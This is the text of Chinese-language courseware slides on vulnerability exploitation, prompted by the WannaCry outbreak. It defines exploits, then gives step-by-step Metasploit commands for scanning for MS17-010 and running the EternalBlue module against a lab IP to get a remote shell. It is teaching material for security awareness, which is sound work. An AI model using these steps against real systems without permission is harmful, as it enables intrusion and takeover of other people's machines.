《信息安全技术基础》课件 3.2漏洞攻击和利用技术

第三单元网络安全攻防技术主要内容任务2漏洞攻击和利用技术任务2漏洞攻击和利用技术全球大面积爆发了“WannaCry勒索病毒”事件引起公司领导高度关注，公司领导要求小卫给全公司介绍一下这部分知识，提高大家的安全意识，小卫决定给大家做一次真实的漏洞利用培训课，让大家真实感受漏洞利用的严重性，提高大家在日常工作和生活中网络安全意识。【任务情境】任务2漏洞攻击和利用技术1、什么是漏洞利用漏洞利用（英语：Exploit，本意为“利用”）是计算机安全术语，指的是利用程序中的某些漏洞，来得到计算机的控制权（使自己编写的代码越过具有漏洞的程序的限制，从而获得运行权限）【知识准备】任务2漏洞攻击和利用技术2、漏洞利用过程为了达到发现网络的漏洞，实现获取密码档、添加用户、控制网站的目标，攻击者进行漏洞利用。通俗的说，漏洞利用就是利用一切可以利用的工具，采用一切可以采用的方法、找到一切可以找到的漏洞，并通过对漏洞资料的研究分析，从而达到获取网站用户资料、添加用户、甚至入侵网站获得管理权限控制整个网站的目的。漏洞利用的基本过程是如下：（1） 对目标网站进行扫描。可以使用已知的漏洞扫描软件进行扫描，查看目标是否有漏洞列表中的漏洞。也可以用一些专门的软件，扫描目标的其他相关信息，包括网站使用的操作系统版本、提供的服务以及开放的端口。（2） 对扫描获得的信息进行分析研究，从而找出漏洞所在及其利用方法。（3） 选用相应的工具，获得密码档、添加用户、获得管理员权限等【知识准备】本次任务通过Metasploit工具（注：本任务使用的metaspolit是kaili系统自带的版本，kaili系统要求是2017以后的版本）实现对具有微软ms17-010漏洞的计算机实行攻击，并获取该计算机管理权限。步骤1：启动Metasploit，如下图3-5所示。任务2漏洞攻击和利用技术【任务实施】图3-5启动攻击工具步骤2：搜索ms17-010的利用工具，输入命令searchms17_010，如下图3-6所示。任务2漏洞攻击和利用技术【任务实施】图3-6搜索利用工具步骤3：首先检测网段内存在漏洞的主机系统（1）加载漏洞扫描辅助模块，输入命令：useauxiliary/scanner/smb/smb_ms17_010//调用scannersmb_ms17_010模块进行扫描，并使用showoptions查看设置参数，如下图3-7所示。任务2漏洞攻击和利用技术【任务实施】图3-7查看扫描参数

（2）设置要扫描的IP如下图所示。任务2漏洞攻击和利用技术【任务实施】（3）设置好之后，使用showoptions查看配置信息。

如下图能看到刚才设置的IP已经添加进来了，如下图所示。图3-8设定扫描目标图3-9查看设定目标（4）使用exploit进行测试（利用测试，显示绿色的+，以及提示信息，即为存在漏洞主机）。如下图所示。任务2漏洞攻击和利用技术【任务实施】图3-10对目标进行测试

步骤4：漏洞利用（1）调用ms17_010的漏洞利用模块。输入命令：useexploit/windows/smb/ms17_010_eternalblue

，如下图3-11所示。任务2漏洞攻击和利用技术【任务实施】图3-11对目标进行攻击（2）使用showoptions查看参数设置，如下图3-12所示。任务2漏洞攻击和利用技术【任务实施】图3-12查看目标信息（3）设置被攻击的主机的IP地址，输入命令：setRHOST192.168.198.136。任务2漏洞攻击和利用技术【任务实施】图3-13对目标进行漏洞利用（4）开始漏洞利用，输入命令:exploit，成功后可以看到顺利的拿到了目标的shell，如下图所示。任务2漏洞攻击和利用技术【任务实施】图3-14获取目标权限任务2漏洞攻击和利用技术【拓展与提高】Metalspolit作为kaili平台中一款重要的渗透测试工具，其强大的易用性和扩展性使它成为一款风靡全球的渗透测试利器，为了进一步巩固学习效果，可自行查找资料练习另一个windows系统下